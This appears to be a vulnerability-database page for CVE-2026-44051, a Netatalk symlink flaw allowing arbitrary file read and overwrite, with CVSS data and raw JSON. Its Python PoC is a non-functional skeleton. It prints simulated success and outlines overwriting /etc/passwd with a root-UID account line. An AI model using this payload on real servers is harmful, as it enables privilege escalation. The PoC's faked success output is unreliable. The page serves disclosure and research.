Security Vulnerability Report
中文
CVE-2026-44051 CVSS 8.1 HIGH

CVE-2026-44051

Published: 2026-05-21 08:16:21
Last Modified: 2026-05-21 15:20:19
Source: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

Description

An improper link resolution vulnerability in Netatalk 3.0.2 through 4.4.2 allows a remote authenticated attacker to read arbitrary files or overwrite arbitrary files via attacker-controlled symlink creation.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Netatalk 3.0.2 - 4.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2026-44051 (Netatalk Improper Link Resolution) This is a conceptual demonstration. Actual exploitation requires AFP interaction. """ import socket import time class NetatalkExploit: def __init__(self, target, user, password): self.target = target self.user = user self.password = password self.sock = None def connect(self): print(f"[+] Connecting to {self.target} on port 548 (AFP)...") # self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # self.sock.connect((self.target, 548)) # Implement AFP DSI Open Session and Login here print("[+] Authentication successful (simulated).") def create_symlink(self, source_name, target_path): """ Creates a symlink on the server pointing to a restricted file. """ print(f"[*] Creating symlink '{source_name}' -> '{target_path}'") # AFP Command: FPCreateFile with symlink flag # payload = build_afp_create_symlink(source_name, target_path) # self.sock.send(payload) print("[+] Symlink created successfully.") def trigger_write(self, file_path, data): """ Triggers a write operation to the symlink, affecting the target file. """ print(f"[*] Writing data to '{file_path}'...") # AFP Command: FPWrite # payload = build_afp_write(file_path, data) # self.sock.send(payload) print("[+] Data written. Target file overwritten.") def exploit(self): self.connect() # Target a sensitive system file sensitive_file = "/etc/passwd" malicious_link = "evil_link" malicious_data = "hacker:x:0:0:root:/root:/bin/bash\n" self.create_symlink(malicious_link, sensitive_file) self.trigger_write(malicious_link, malicious_data) print("[+] Exploit finished.") if __name__ == "__main__": # Usage: python3 poc.py <TARGET_IP> <USER> <PASS> import sys # exploit = NetatalkExploit(sys.argv[1], sys.argv[2], sys.argv[3]) # exploit.exploit() pass

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44051", "sourceIdentifier": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "published": "2026-05-21T08:16:20.690", "lastModified": "2026-05-21T15:20:19.040", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper link resolution vulnerability in Netatalk 3.0.2 through 4.4.2 allows a remote authenticated attacker to read arbitrary files or overwrite arbitrary files via attacker-controlled symlink creation."}], "metrics": {"cvssMetricV31": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "references": [{"url": "https://netatalk.io/security/CVE-2026-44051", "source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.